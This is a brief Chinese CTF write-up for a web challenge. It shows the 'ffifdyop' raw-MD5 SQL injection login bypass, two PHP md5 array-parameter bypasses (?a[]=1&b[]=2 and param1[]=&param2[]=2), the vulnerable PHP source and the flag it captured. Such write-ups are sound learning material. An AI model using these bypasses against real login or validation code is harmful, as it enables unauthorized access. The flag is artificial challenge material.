打开发现

但是发现无论尝试输入什么,都没有任何反应。太难了太难了~~~

发现别人的wp看了响应头

果然里面有提示 Hint: select * from 'admin' where password=md5($pass,true)

ma5函数在指定true时,会返回的原始 16 字符二进制格式

然后又找到了一个万能密码ffifdyop,这个密码在MD5运算后的结果是'or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c
连起来就是select * from 'admin' where password=or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c

然后进入下一步

在源代码中看见了

这不就简单的数组绕过嘛

?a[]=1&b[]=2

发现又来一次

 <?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
} 

为啥相同的要来两遍,还是数组绕过

param1[]=&param2[]=2

得到flag flag{a78f947a-1f9f-4333-ba70-8081bcb5848a}